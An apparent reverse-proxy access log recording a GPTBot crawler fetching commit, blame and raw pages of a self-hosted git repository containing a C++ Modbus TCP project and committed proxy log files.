"/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15178] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10235] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13922] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13904] [Gzip 7.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16830] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10817] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16830] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10817] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10238] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10236] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21644] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21642] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11294] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10220] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10222] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10455] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10320] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10321] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 155286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 3754003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 305719] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 376460] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10445] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12021] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10605] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11598] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11600] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11566] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11396] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" 